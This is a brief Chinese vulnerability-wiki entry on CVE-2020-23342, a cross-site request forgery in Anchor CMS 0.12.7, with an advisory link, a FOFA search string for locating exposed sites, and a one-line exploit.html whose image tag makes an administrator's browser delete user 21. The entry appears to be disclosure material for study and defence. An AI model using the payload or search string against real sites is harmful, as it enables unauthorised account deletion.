fofamini-wiki

登录白背景

源码

Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342

漏洞描述

https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt

网络测绘

"Anchor CMS" && body="themes/default/img/favicon.png"

漏洞复现

Anchor CMS使用Get方法进行敏感操作，可以使用exploit.html进行删除用户等操作。

exploit.html：

<img src="http://target/anchor/index.php/admin/users/delete/21">

当管理员点击时删除ID为21的用户。